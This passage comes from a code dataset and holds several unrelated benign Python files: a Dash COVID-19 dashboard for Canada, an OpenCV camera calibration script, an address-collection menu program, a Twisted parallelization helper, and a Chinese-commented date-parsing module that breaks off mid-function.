This dashboard allows a user to filter cumulative cases and daily \\\n \t\tincrease in a province or territory.", style = {'display': 'inline'}),\n \thtml.P(df.columns[0].split('Please')[0]),\n\n \t], \n\n \tstyle={ 'textAlign': 'left',\n\t\t\t 'color': colors['text'],\n\t\t\t 'padding-left': 70,\n\t\t\t 'padding-right': 70}\n\t ),\n\n # indicators\n html.Div([\n \thtml.Div([html.H3(df.shape[0]), \n \t\t\t html.H5('Confirmed')], \n \t\t\t style = indicator_style, \n \t\t\t className = 'three columns'),\n \thtml.Div([html.H3(mortality.shape[0]),\n \t\t\t html.H5('Deaths')], \n \t\t\t style = indicator_style, \n \t\t\t className = 'three columns'),\n \thtml.Div([html.H3(recovered.groupby('province').cumulative_recovered.max().sum()),\n \t\t\t html.H5('Recovered')], \n \t\t\t style = indicator_style, \n \t\t\t className = 'three columns'),\n \thtml.Div([html.H3(testing.groupby('province').cumulative_testing.max().sum()),\n \t\t\t html.H5('Testing')], \n \t\t\t style = indicator_style, \n \t\t\t className = 'three columns'),\n\n \t], className = 'row', style = {'margin-top': 30, 'padding-left': 150}),\n\n\n # Overview of the country (map and line chart)\n html.Div([\n\n \t# line chart\n \thtml.Div([\n \t\t# selector\n \t\thtml.Div([\n\t \t\tdcc.RadioItems(\n\t \t\t\tid = 'scale-type',\n\t \t\t\toptions = [{'label': i, 'value': i} for i in ['Linear', 'Log']],\n\t \t\t\tvalue = 'Log',\n\t \t\t\tlabelStyle = {'display': 'inline-block'},\n\t \t\t\tstyle = {'background': colors['background'], \n\t \t\t\t\t\t'color': colors['text'], \n\t \t\t\t\t\t'padding-top': 40,\n\t \t\t\t\t\t'padding-left': 70,}\n\t \t\t\t)\n \t\t ]),\n \t\t# the chart\n \t\thtml.Div([\n\t \t\tdcc.Graph(\n\t \t\t\tid = 'canada-line',\n\t \t\t\t)\n \t\t ])\n \t\t], className = 'six columns'),\n\n \t# map\n \thtml.Div([\n \t\thtml.Div([\n\t \t\tdcc.Graph(\n\t \t\t\tid = 'canada-map',\n\t \t\t\tfigure = fig,\n\t \t\t\t)]),\n \t\t], className = 'six columns')\n\t ], className = 'row', style = {'padding-top': 50}), # end of country overview\n\n\n\n # # curve by province\n html.Div([\n # \t# selectors + line chart\n \thtml.Div([\n \t\t# selector Dropdown\n \t\thtml.Div([\n \t\t\thtml.P(children = 'Choose a province from the dropdown menu', \n \t\t\t\tstyle = {'backgroundColor': colors['background'],\n \t\t\t\t\t\t'color': colors['text']}),\n\n \t\t\tdcc.Dropdown(\n \t\t\t\tid = 'province-select',\n \t\t\t\toptions = [ \n \t\t\t\t\t\t\n \t\t\t\t\t\t\t{'label': i, 'value': i} for i in df['province'].unique()\n\n \t\t\t\t\t\t\t],\n \t\t\t\tvalue = 'Ontario',\n \t\t\t\t),\n \t\t\t], style = { 'padding-left': 70, 'padding-right': 100}),\n \t\t# selector RadioItems\n \t\thtml.Div([\n \t\t\thtml.P(children = 'Choose a calculation type',\n \t\t\t\tstyle = {'backgroundColor': colors['background'],\n \t\t\t\t\t\t'color': colors['text'],\n \t\t\t\t\t\t'margin-left': '15'}),\n\n \t\t\tdcc.RadioItems(\n \t\t\t\tid = 'calculation-type',\n \t\t\t\toptions = [{'label':i, 'value':i} for i in ['Cumulative Cases', 'New Cases']],\n \t\t\t\tvalue = 'Cumulative Cases',\n \t\t\t\tlabelStyle = {'display': 'inline-block'},\n \t\t\t\tstyle = {'background': colors['background'], 'color': colors['text']}\n \t\t\t\t)\n \t\t\t], style = { 'padding-left': 70, 'padding-top': 30}),\n \t\t# line chart\n \t\thtml.Div([\n \t\t\thtml.Div([\n \t\t\t\tdcc.Graph(id = 'line-by-province'),\n \t\t\t\t],),\n\n \t\t], style = {'backgroundColor': colors['background']}), \n\n \t], className = 'seven columns'), # end of selectors + line charts\n\n # \t\t# 
table\n\t\thtml.Div([\n\t\t\thtml.P('Distribution of cases in regions of a province/territory',\n\t\t\t\tstyle = {'color': colors['text'], 'padding-bottom': 20}),\n\t\t\thtml.Div(id = 'datatable'),\n\t\t\t], className = 'five columns', style={'margin-top': 100}),\n\n\n ], className = 'row', style = {'margin-top': 70}), # end of province div\n\n\n\n # other stats\n html.Div([\n \t# the tab selector\n \tdcc.Tabs(\n \t\tid = 'stats-tab',\n \t\tvalue = 'mortality-tab',\n \t\tchildren = [\n \t\t\t\t\tdcc.Tab(label = 'Mortality', value = 'mortality-tab', \n \t\t\t\t\t\tstyle = tab_style, selected_style = tab_selected_style),\n \t\t\t\t\tdcc.Tab(label = 'Recovered', value = 'recover-tab',\n \t\t\t\t\t\tstyle = tab_style, selected_style = tab_selected_style),\n \t\t\t\t\tdcc.Tab(label = 'Testing', value = 'testing-tab',\n \t\t\t\t\t\tstyle = tab_style, selected_style = tab_selected_style)\n \t\t\t\t\t],\n \t\tstyle = tabs_styles,),\n\n \tdcc.Graph(id = 'other-stats'),\n \t], style = {'margin-top': 70}),\n\n # sankey diagram\n html.Div([\n html.Div(children = ['At this moment, more than half of COVID-19 cases in Canada are related to community transmission. \\\n But at the early stage of the outbreak, the majority were due to travel. \\\n The lack of a universal reporting format among provinces and territories makes it hard to have \\\n a clear picture of how human migration across borders initiated the spread within Canada. \\\n Less than 10 percent of cases reported by governments indicate whether there was a travel history, \\\n and an even smaller fraction of reported cases indicate where the patient had traveled. \\\n The data is not perfect. However, the graphic below can still visualize where the early \\\n waves of cases came from.'],\n style={ 'textAlign': 'left',\n 'color': colors['text'],\n 'padding-left': 70,\n 'padding-right': 70,\n 'padding-top': 70}\n ),\n\n \tdcc.Graph(\n \t\tid = 'sankey',\n \t\tfigure = genSankey(sankey_df, cat_cols = ['from', 'to'], value_cols = 'count'),\n \t\t)\n \t]),\n\n # credits\n html.Div([\n \thtml.P('Developed by Yang Sun'),\n \thtml.A('DataLabTo', href = 'http://www.datalabto.ca/about/', target = '_blank',),\n \thtml.Br(),\n \thtml.A('Contact', href = 'mailto:sun.yang.ys57f@gmail.com'),\n \t], className = \"twelve columns\", \n \t style = {'fontSize': 15, 'padding-bottom': 30, 'padding-top': 30,\n \t \t\t\t'textAlign': 'center', \n \t \t\t\t'backgroundColor': colors['background'],\n \t \t\t\t'color': colors['text'],}),\n\n]) # end of global div\n\n\n# ------------ Part Three. Callbacks --------------------\n@app.callback(\n\tOutput('canada-line', 'figure'),\n\t[Input('scale-type', 'value')]\n\t)\ndef canada_line_update(yaxis_type):\n\n\treturn{\n\n\t\t'data': [dict(x = canada.index, \n\t\t\t\ty = canada.cumu, \n\t\t\t\ttype = 'line', \n\t\t\t\tname = 'Cumulative cases',\n\t\t\t\tmarker = {'color': colors['line']}),\n\t\t\t\tdict(x = canada.index, \n\t\t\t\t\ty = canada.date_report, \n\t\t\t\t\ttype = 'bar', \n\t\t\t\t\tname = 'New confirmed',\n\t\t\t\t\tmarker = {'color': colors['bar']})],\n\t\t'layout': dict(\n\t\t\tplot_bgcolor = colors['background'],\n\t\t\tpaper_bgcolor = colors['background'],\n\t\t\tfont = dict(color = colors['text']),\n\t\t\txaxis = {'gridcolor': colors['grid'], 'gridwidth': 0.05},\n\t\t\tyaxis = {'gridcolor': colors['grid'], 'gridwidth': 0.05,\n\t\t\t\t\t'title': 'No. 
of cases',\n\t\t\t\t\t'type': 'linear' if yaxis_type == 'Linear' else 'log'},\n\t \t legend={ 'x':0, 'y':1},\n\t \t margin = {'l':90, 'b':40, 't':10, 'r':40}\n\t\t\t)\n\n\t\t}\n\n\n\n@app.callback(\n\tOutput('line-by-province', 'figure'),\n\t[Input('province-select', 'value'),\n\tInput('calculation-type', 'value')]\n\t)\ndef update_line_chart(province, calculation_type):\n\tdf_province = pd.DataFrame(dff[dff.province == province].index.value_counts()).reset_index()\n\tdf_province = df_province.set_index('index')\n\tdf_province = df_province.resample('d').sum().fillna(0)\n\tdf_province['cumu'] = df_province['date_report'].cumsum()\n\n\tif calculation_type == 'New Cases':\n\t\treturn {\n\n\t\t\t'data':[dict(\n\t\t\t\tx = df_province.index,\n\t\t\t\ty = df_province.date_report,\n\t\t\t\ttype = 'bar',\n\t\t\t\tmarker = {'color': colors['bar']}\n\t\t\t\t)\n\t\t\t],\n\t\t\t'layout': dict(\n\t\t\t\tyaxis = {'title': 'No. of new cases'},\n\t\t\t\tplot_bgcolor = colors['background'],\n\t\t\t\tpaper_bgcolor = colors['background'],\n\t\t\t\tfont = {'color': colors['text']},\n\t\t\t\tmargin = {'l':90, 'b':40, 't':10, 'r':40}\n\n\t\t\t\t)\n\t\t}\n\telse: \n\t\treturn {\n\n\t\t\t'data':[dict(\n\t\t\t\tx = df_province.index,\n\t\t\t\ty = df_province.cumu,\n\t\t\t\ttype = 'line',\n\t\t\t\tmarker = {'color': colors['line']}\n\t\t\t\t)\n\t\t\t],\n\t\t\t'layout': dict(\n\t\t\t\tyaxis = {'title': 'No. of cumulative cases'},\n\t\t\t\tplot_bgcolor = colors['background'],\n\t\t\t\tpaper_bgcolor = colors['background'],\n\t\t\t\tfont = {'color': colors['text']},\n\t\t\t\tmargin = {'l':90, 'b':40, 't':10, 'r':40}\n\t\t\t\t)\n\t\t}\n\n\n\n@app.callback(\n\tOutput('datatable', 'children'),\n\t[Input('province-select', 'value')]\n\t)\ndef update_datatable(province):\n\tprovince_counts = pd.DataFrame(df[df['province'] == province]['health_region'].value_counts()).reset_index().\\\n\t\t\t\t\t rename(columns = {'index': 'REGION', 'health_region': 'CONFIRMED CASES'})\n\tcolumns = [{'name': i, 'id': i} for i in province_counts.columns]\n\tdata = province_counts.to_dict('records')\n\treturn dt.DataTable(data = data, \n\t\t\t\t\t columns = columns, \n\t\t\t\t\t page_size = 10,\n\t\t\t\t\t style_cell = {'backgroundColor': colors['background'], 'color': colors['text']},\n\t\t\t\t\t style_header = {\n\t\t\t\t\t \t'fontWeight': 'bold',\n\t\t\t\t\t \t'backgroundColor': tab_selected_style['backgroundColor'],\n\t\t\t\t\t })\n\n\n\n@app.callback(\n\tOutput('other-stats', 'figure'),\n\t[Input('stats-tab', 'value')]\n\t)\ndef update_stats_graph(tab):\n\tif tab == 'mortality-tab':\n\t\treturn {\n\n\t\t\t'data':[dict(\n\t\t\t\tx = mortality.province.value_counts().index,\n\t\t\t\ty = mortality.province.value_counts().values,\n\t\t\t\ttype = 'bar',\n\t\t\t\tmarker = {'color': colors['bar']},\n\t\t\t\t)\n\t\t\t],\n\t\t\t'layout': stats_charts_style\n\t\t}\n\tif tab == 'recover-tab':\n\t\treturn {\n\n\t\t\t'data':[dict(\n\t\t\t\tx = recovered.groupby('province').cumulative_recovered.max().sort_values(ascending=False).index,\n\t\t\t\ty = recovered.groupby('province').cumulative_recovered.max().sort_values(ascending=False).values,\n\t\t\t\ttype = 'bar',\n\t\t\t\tmarker = {'color': colors['bar']},\n\t\t\t\t)\n\t\t\t],\n\t\t\t'layout': stats_charts_style\n\t\t}\n\telse:\n\t\treturn {\n\n\t\t\t'data':[dict(\n\t\t\t\tx = testing.groupby('province').cumulative_testing.max().sort_values(ascending=False).index,\n\t\t\t\ty = testing.groupby('province').cumulative_testing.max().sort_values(ascending=False).values,\n\t\t\t\ttype = 
'bar',\n\t\t\t\tmarker = {'color': colors['bar']},\n\t\t\t\t)\n\t\t\t],\n\t\t\t'layout': stats_charts_style\n\t\t}\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"9515314","text":"#!/usr/bin/python3\n# coding=utf-8\nimport sys, os\nimport cv2\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import least_squares\nimport scipy.linalg as linalg\n\n\nPROJECT_NAME = \"Computer Vision Demonstration Project 2 - Requirement 3\"\nPROJECT_DESC = \"Extrisic Calibration\"\nSNAPSHOT_WIN = \"Snapshot\"\nUNDISTORT_WIN = \"Undistort\"\nRAW_WIN = \"RAW Video\"\n\nCIRCLE_RADIUS = 5\nCIRCLE_COLOR = (0,0,255)\nRULLER_COLOR = (255,0,0)\n\nBOARD_W = 8;\nBOARD_H = 6;\n\nraw_click_count = 0\nraw_p1 = (0,0)\nraw_p2 = (0,0)\n\nund_click_count = 0\nund_p1 = (0,0)\nund_p2 = (0,0)\n\n\n\n\n\ndef calibrate():\n\n width = 20.4 / BOARD_W\n heigth = 14.6 / BOARD_H\n\n WRL = np.zeros((48,2))\n\n i = 0\n for y in range(BOARD_H):\n for x in range(BOARD_W):\n WRL[i] = ((x * width), (y * heigth))\n i += 1\n\n fs = cv2.FileStorage('intrinsics.xml', cv2.FILE_STORAGE_READ)\n intrinsics = fs.getNode('floatdata').mat()\n fs.release()\n\n fs = cv2.FileStorage('distortion.xml', cv2.FILE_STORAGE_READ)\n distortion = fs.getNode('floatdata').mat()\n fs.release()\n\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\n cap = cv2.VideoCapture(0)\n ret, frame = cap.read()\n h, w = frame.shape[:2]\n\n newcameramtx, roi = cv2.getOptimalNewCameraMatrix(intrinsics, distortion, (w, h), 1, (w, h))\n\n mapx, mapy = cv2.initUndistortRectifyMap(intrinsics, distortion, None, newcameramtx, (w, h), 5)\n\n cv2.namedWindow(UNDISTORT_WIN) # Create a named window\n cv2.moveWindow(UNDISTORT_WIN, 10, 10)\n cv2.namedWindow(RAW_WIN) # Create a named window\n cv2.moveWindow(RAW_WIN, 650, 10)\n\n found = False\n exit = False\n start = False\n\n print(\"setup camera and chessboard and press s to start...\")\n print(\"press q to quit without finding chessboard...\")\n\n while (not found) and (not exit):\n\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n if ret:\n\n #frame = cv2.flip(f, 1)\n\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n undist = cv2.remap(frame, mapx, mapy, cv2.INTER_LINEAR)\n\n undist_gray = cv2.cvtColor(undist, cv2.COLOR_BGR2GRAY)\n\n ret, corners = cv2.findChessboardCorners(undist_gray, (BOARD_W, BOARD_H), None)\n\n if start and ret and (len(corners) == BOARD_W * BOARD_H):\n\n found = True\n\n CAM = cv2.cornerSubPix(undist_gray, corners, (11, 11), (-1, -1), criteria)\n\n # Draw and display the corners\n undist = cv2.drawChessboardCorners(undist, (BOARD_W, BOARD_H), CAM, ret)\n\n # Display the resulting frame\n cv2.imshow(UNDISTORT_WIN, undist) # Se achou mostra snapshot colorido\n else:\n cv2.imshow(UNDISTORT_WIN, undist_gray) # Se nao achou mostra snapshot p&b\n\n # Display the resulting frame\n cv2.imshow(RAW_WIN, frame)\n\n key = cv2.waitKey(3)\n\n if key& 0xFF == ord('s'):\n start = True\n if key & 0xFF == ord('q'):\n return\n\n CAM = CAM.reshape(48,2)\n\n A = np.zeros((2*BOARD_W*BOARD_H, 9))\n\n for i in range(BOARD_W*BOARD_H):\n A[i*2] = (\n WRL[i][0], # X\n WRL[i][1], # Y\n 1, # 1\n 0, # 0\n 0, # 0\n 0, # 0\n - CAM[i][0] * WRL[i][0], # -xX\n - CAM[i][0] * WRL[i][1], # -xY\n - CAM[i][0] # x\n )\n A[(i*2)+1] = (\n 0, # 0\n 0, # 0\n 0, # 0\n WRL[i][0], # X\n WRL[i][1], # Y\n 1, # 
1\n - CAM[i][1] * WRL[i][0], # -yX\n - CAM[i][1] * WRL[i][1], # -yY\n - CAM[i][1] # y\n )\n\n #np.set_printoptions(linewidth=160)\n\n U, s, Vh = linalg.svd(A)\n\n V = np.transpose(Vh)\n\n P = np.array([row[8] for row in V]).reshape((3,3))\n\n p = P.reshape(9)\n\n X = np.array([row[0] for row in WRL])\n Y = np.array([row[1] for row in WRL])\n\n x = np.array([row[0] for row in CAM])\n y = np.array([row[1] for row in CAM])\n\n def func(p, x, y, X, Y):\n\n proj_x = (p[0]*X + p[1]*Y + p[2]) / (p[6]*X + p[7]*Y + p[8])\n\n proj_y = (p[3]*X + p[4]*Y + p[5]) / (p[6]*X + p[7]*Y + p[8])\n\n r = (x - proj_x) ** 2 + (y - proj_y) ** 2\n\n return r\n\n res = least_squares(func, p, args=(np.array(x), np.array(y), np.array(X), np.array(Y)), max_nfev=9000, verbose=0)\n\n new_P = res.x.reshape((3, 3))\n\n H = np.array(np.matmul(linalg.inv(intrinsics) , new_P))#@\n\n h1 = np.array([row[0] for row in H])\n h2 = np.array([row[1] for row in H])\n\n _R = (2/(linalg.norm(h1) + linalg.norm(h2))) * H\n\n t = np.array([row[2] for row in _R])\n\n r1 = np.array([row[0] for row in _R])\n r2 = np.array([row[1] for row in _R])\n r3 = r1 * r2\n\n _R = np.append(np.append(r1, r2), r3).reshape((3,3))\n\n U, s, Vh = linalg.svd(_R)\n\n R = np.matmul(U, Vh) # @\n\n r = np.array([row[:2] for row in R])\n print(\"\\nr (rotation matrix:\")\n print(r)\n\n print(\"\\nt (translation vector:\")\n print(t)\n print(\"\\n||t||:\", linalg.norm(t))\n\n fs = cv2.FileStorage('rotation.xml', cv2.FILE_STORAGE_WRITE)\n fs.write(\"floatdata\", r)\n fs.release()\n\n fs = cv2.FileStorage('translation.xml', cv2.FILE_STORAGE_WRITE)\n fs.write(\"floatdata\", t)\n fs.release()\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n cv2.namedWindow(UNDISTORT_WIN) # Create a named window\n cv2.moveWindow(UNDISTORT_WIN, 10, 10)\n cv2.namedWindow(RAW_WIN) # Create a named window\n cv2.moveWindow(RAW_WIN, 650, 10)\n\n\ndef do_the_job():\n calibrate()\n\n# Main Function\ndef Run():\n\n print(\"\\n%s\\n%s\" % (PROJECT_NAME, PROJECT_DESC))\n print(\"\\nTested with python3.6.4, opencv 3 and opencv-python 3.4.0\")\n\n print(\"\\nCurrent opencv-python version: %s\\n\" % cv2.__version__)\n\n if len(sys.argv) != 1:\n print('\\nSyntax: %s\\n' % sys.argv[0])\n sys.exit(-1)\n\n do_the_job()\n\nif __name__ == '__main__':\n Run()\n","sub_path":"Multiple_View/ref/req3.py","file_name":"req3.py","file_ext":"py","file_size_in_byte":6450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"542225862","text":"from classAddress import Address as CA\nfrom classCollection import CollectionAddress as CC\nfrom classCollectionCaretaker import CollectionCaretaker\nfrom decorator import *\n\ndef main():\n options = '1 - insert collection from file\\n2 - print collection\\n3 - sort\\n4 - search\\n5 - delete obj\\n6 - add new obj\\n7 - edit obj\\n8 - show history\\n9 - undo\\n10 - redo\\n11 - exit\\n'\n collect = CC()\n caretaker = CollectionCaretaker(collect)\n while True:\n try:\n print(options)\n choice = enterIntInRange(0, 'Enter choice : ', 0, 11)\n\n if choice == 1: readFromFileMenu(caretaker, collect)\n elif choice == 2: print(collect)\n elif choice == 3: sortMenu(caretaker, collect)\n elif choice == 4: searchMenu(collect)\n elif choice == 5: deleteMenu(caretaker, collect)\n elif choice == 6: newObjMenu(caretaker, collect)\n elif choice == 7: editObjMenu(caretaker, collect)\n elif choice == 8: mementoHistoryMenu(caretaker)\n elif choice == 9: undoMenu(caretaker, collect) \n elif choice == 10: 
redoMenu(caretaker, collect)\n elif choice == 11: break\n\n except Exception as e:\n print('Error ', '--'*20, ' ',e)\n\ndef readFromFileMenu(caretaker, collect):\n caretaker.backup()\n collect.readJsonFile('data.json')\n collect.writeJsonFile(\"output.json\")\n\ndef sortMenu(caretaker, collect):\n attr = enterStr('0', 'Enter attribute: ')\n caretaker.backup()\n collect.sort(attr)\n collect.writeJsonFile(\"output.json\")\n\ndef searchMenu(collect):\n value = enterStr('0', \"Enter search elem - \")\n collect.search(value)\n\ndef deleteMenu(caretaker, collect):\n index = enterIntInRange(0, f'Enter index from 0 to {len(collect) - 1}: ', 0, len(collect) -1)\n caretaker.backup()\n collect.deleteElem(index)\n collect.writeJsonFile(\"output.json\")\n\ndef newObjMenu(caretaker, collect):\n caretaker.backup()\n collect.addNewAddress()\n collect.writeJsonFile(\"output.json\")\n\ndef editObjMenu(caretaker, collect):\n caretaker.backup()\n collect.editAddress()\n collect.writeJsonFile(\"output.json\")\n\ndef mementoHistoryMenu(caretaker):\n caretaker.show_history()\n\ndef undoMenu(caretaker, collect):\n caretaker.undo()\n collect.writeJsonFile(\"output.json\")\n\ndef redoMenu(caretaker, collect):\n caretaker.redo()\n collect.writeJsonFile(\"output.json\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python/Programming/UnitTests/programmingTask6.py","file_name":"programmingTask6.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"119242316","text":"# -*- test-case-name: twext.python.test.test_parallel -*-\n##\n# Copyright (c) 2012-2014 Apple Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##\n\n\"\"\"\nUtilities for parallelizing tasks.\n\"\"\"\n\nfrom twisted.internet.defer import inlineCallbacks, DeferredList, returnValue\n\nclass Parallelizer(object):\n \"\"\"\n Do some operation with a degree of parallelism, using a set of resources\n which may each only be used for one task at a time, given some underlying\n API that returns L{Deferreds}.\n\n @ivar available: A list of available resources from the C{resources}\n constructor parameter.\n\n @ivar busy: A list of resources which are currently being used by\n operations.\n \"\"\"\n\n def __init__(self, resources):\n \"\"\"\n Initialize a L{Parallelizer} with a list of objects that will be passed\n to the callables sent to L{Parallelizer.do}.\n\n @param resources: objects which may be of any arbitrary type.\n @type resources: C{list}\n \"\"\"\n self.available = list(resources)\n self.busy = []\n self.activeDeferreds = []\n\n\n @inlineCallbacks\n def do(self, operation):\n \"\"\"\n Call C{operation} with one of the resources in C{self.available},\n removing that value for use by other callers of C{do} until the task\n performed by C{operation} is complete (in other words, the L{Deferred}\n returned by C{operation} has fired).\n\n @param operation: a 1-argument callable taking a resource from\n C{self.active} and returning 
a L{Deferred} when it's done using\n that resource.\n @type operation: C{callable}\n\n @return: a L{Deferred} that fires as soon as there are resources\n available such that this task can be I{started} - not completed.\n \"\"\"\n if not self.available:\n yield DeferredList(self.activeDeferreds, fireOnOneCallback=True,\n fireOnOneErrback=True)\n active = self.available.pop(0)\n self.busy.append(active)\n o = operation(active)\n def andFinally(whatever):\n self.activeDeferreds.remove(o)\n self.busy.remove(active)\n self.available.append(active)\n return whatever\n self.activeDeferreds.append(o)\n o.addBoth(andFinally)\n returnValue(None)\n\n\n def done(self):\n \"\"\"\n Wait until all operations started by L{Parallelizer.do} are completed.\n\n @return: a L{Deferred} that fires (with C{None}) when all the currently\n pending work on this L{Parallelizer} is completed and C{busy} is\n empty again.\n \"\"\"\n return (DeferredList(self.activeDeferreds)\n .addCallback(lambda ignored: None))\n","sub_path":"twext/trunk/twext/python/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"590845501","text":"# 当前文件名\nmo = __file__[__file__.rfind('/')+1:]\n\n# 数据结构\nchaos = []\n\n\n# Time\n# 用来指示时间,读取文本时候会判断时间,然后把文本装进对应时间的数据结构里\nclass Time:\n zone = 0\n year = -10000\n month = 0\n day = 0\n\n @classmethod\n def reset(cls):\n Time.zone = 0\n Time.year = -100000\n Time.month = 0\n Time.day = 0\n\n @classmethod\n def set_zone(cls,num):\n Time.zone = num\n \n @classmethod\n def set_year(cls,num):\n Time.year = num\n\n @classmethod\n def set_month(cls,num):\n Time.month = num\n\n @classmethod\n def set_day(cls,num):\n Time.day = num\n \n @classmethod\n def display(cls):\n if Time.zone == 0:\n print('\\n无时间域\\n')\n elif Time.zone == 1:\n print(f'\\n现在是{Time.year}年\\n')\n elif Time.zone == 2:\n print(f'\\n现在是{Time.year}年{Time.month}月\\n')\n elif Time.zone == 3:\n print(f'\\n现在是{Time.year}年{Time.month}月{Time.day}日\\n')\n\n\n\n\n# Year\n# 表示年的类,可以用来装某年对应的文本\n# 类属性\n# Year.years 字典,年份-对象 int-\n# 实例属性\n# self.year = int 记录年份\n# self.content = list 记录内容\n# self.months = dict 记录月份与对应的对象实例 int-\n# 类方法\n# Year.newyear(num) 创建一个新年份,年份是num\n# Year.get_year(year) 返回某年的实例对象\n# Year.addcontent_Year(year,str) 往某年中加内容\n# Year.check_year_existed(year) 检查num年是否存在\n# Year.get_yearlist_ordered() 返回一个已有年份的列表\n# Year.get_monthlist_ordered(year) 返回某年的已有月份列表\n# Year.check_month_in_year(year,month) 检查某年是否有某月\n# Year.newmonth(year,month) 在某年中创建某月的Month实例\n# Year.get_month(year,month) 得到某年的某月的Month实例\nclass Year:\n # 所有year的字典,key-value是年份-对象 int-\n years = {}\n def __init__(self,year):\n self.year = year\n self.content = []\n self.months = {}\n # 初始化某年\n @ classmethod\n def newyear(cls,num):\n if Year.check_year_existed(num):\n raise Exception(f'创建失败,{num}年已经存在!')\n Year.years[num] = Year(num)\n # 返回一个从小到大排序好的yearlist列表\n @classmethod\n def get_yearlist_ordered(cls):\n yearlist = list(Year.years.keys())\n return sorted(yearlist)\n # 检查某年是否已经存在\n @classmethod\n def check_year_existed(cls,year):\n yearlist = Year.get_yearlist_ordered()\n for item in yearlist:\n if item == year:\n return True\n return False\n @classmethod\n def get_year(cls,year):\n return Year.years[year]\n @classmethod\n def get_monthlist_ordered(cls,year):\n monthlist = list(Year.get_year(year).months.keys())\n return sorted(monthlist)\n @classmethod\n def check_month_in_year(cls,year,month):\n monthlist_in_year = 
Year.get_monthlist_ordered(year)\n for item in monthlist_in_year:\n if item == month:\n return True\n return False\n @classmethod\n def newmonth(cls,year,month):\n if Year.check_month_in_year(year,month):\n raise Exception(f'创建月份失败,{year}年中{month}月已存在!')\n Year.get_year(year).months[month] = Month(month)\n @classmethod\n def get_month(cls,year,month):\n if not Year.check_month_in_year(year,month):\n raise Exception(f'获取失败,{year}年中{month}月不存在!')\n return Year.get_year(year).months[month]\n @classmethod\n def addcontent_Year(cls,year,str):\n if not Year.check_year_existed(year):\n raise Exception(f'添加内容失败,{year}年还不存在,请创建后再往里添加内容')\n Year.get_year(year).content.append(str)\n\n\n\n\n\n\n\n\n# Month \n# 表示月的类,可以用来装某年某月对应的文本\n# 实例属性\n# self.month = int 记录月份\n# self.content = list 记录内容\n# self.days = dict 记录日子以及对应的实例\n# 实例方法\n# self.addcontent_Month(str) 给该月份加内容\n# self.get_daylist_ordered() 返回一个该月份实例的日子时序列表\n# self.check_day_in_month(day) 检查该月份中是否有某日\n# self.newday(day) 给某月创建某日\n# self.get_day(day) 获取某日的实例对象\nclass Month:\n def __init__(self,month):\n self.month = month\n self.content = []\n self.days = {}\n def addcontent_Month(self,str):\n self.content.append(str)\n def get_daylist_ordered(self):\n daylist = list(self.days.keys())\n return sorted(daylist)\n def check_day_in_month(self,day):\n for item in self.get_daylist_ordered():\n if item == day:\n return True\n return False\n def newday(self,day):\n if self.check_day_in_month(day):\n raise Exception('创建day实例失败,指定day已经存在!')\n self.days[day] = Day(day)\n def get_day(self,day):\n if not self.check_day_in_month(day):\n raise Exception('获取day实例失败,指定day不存在!')\n return self.days[day]\n\n\n\n\n\n\n\n# Day\n# 表示日的类,可以用来装某年某月某日对应的文本\n# 实例属性\n# self.day = int 记录日子\n# self.content = list 记录内容\n# 实例方法\n# self.addcontent_Day(str) 为Day实例添加内容\nclass Day:\n def __init__(self,day):\n self.day = int (day)\n self.content = []\n def addcontent_Day(self,str):\n self.content.append(str)\n\n\n\n\n\n\n# 根据一个lenth最多16的字符串来设定时间域\n# 返回值:0,1,2,3,6\n# 0 没改\n# 1 改年\n# 2 改月\n# 3 改日\n# 8 8数字改\ndef line_set_time(str):\n number = ''\n counter = 0\n nyr = [False,False,False]\n# 一次检测获取信息\n for char in str:\n if char =='#':\n counter +=1\n if char.isdigit():\n number = number + char\n if char == '年':\n nyr[0] = True\n if char == '月':\n nyr[1] = True\n if char == '日' or char == '号':\n nyr[2] = True\n# 年月日判定最优先 \n if nyr == [True, False, False]:\n num_nyr = ['','','']\n for char in str:\n if char == '年':\n break\n if char.isdigit():\n num_nyr[0] = num_nyr[0] + char\n Time.set_zone(1)\n if num_nyr[0] !='':\n Time.set_year(int(num_nyr[0]))\n return (1,'\\n年月日检测,年改了\\n')\n\n if nyr == [False, True, False]:\n num_nyr = ['','','']\n for char in str:\n if char == '月':\n break\n if char.isdigit():\n num_nyr[1] = num_nyr[1] + char\n Time.set_zone(2)\n if num_nyr[1] !='':\n Time.set_month(int(num_nyr[1]))\n return (2,'\\n年月日检测,月改了\\n')\n\n if nyr == [False, False, True]:\n num_nyr = ['','','']\n for char in str:\n if char == '日' or char == '号':\n break\n if char.isdigit():\n num_nyr[2] += char\n Time.set_zone(3)\n if num_nyr[2] !='':\n Time.set_day(int(num_nyr[2]))\n return (3,'\\n年月日检测,日改了\\n')\n\n if nyr == [True,True,False]:\n num_nyr = ['','','']\n s = 0\n for char in str:\n if char == '年':\n s += 1\n if char == '月':\n break\n if char.isdigit():\n num_nyr[s] += char\n Time.set_zone(2)\n if num_nyr[0] !='':\n Time.set_year(int(num_nyr[0]))\n if num_nyr[1] !='':\n Time.set_month(int(num_nyr[1]))\n return (2,'\\n年月日检测,年月改了\\n')\n\n if nyr == [False,True,True]:\n num_nyr = ['','','']\n s 
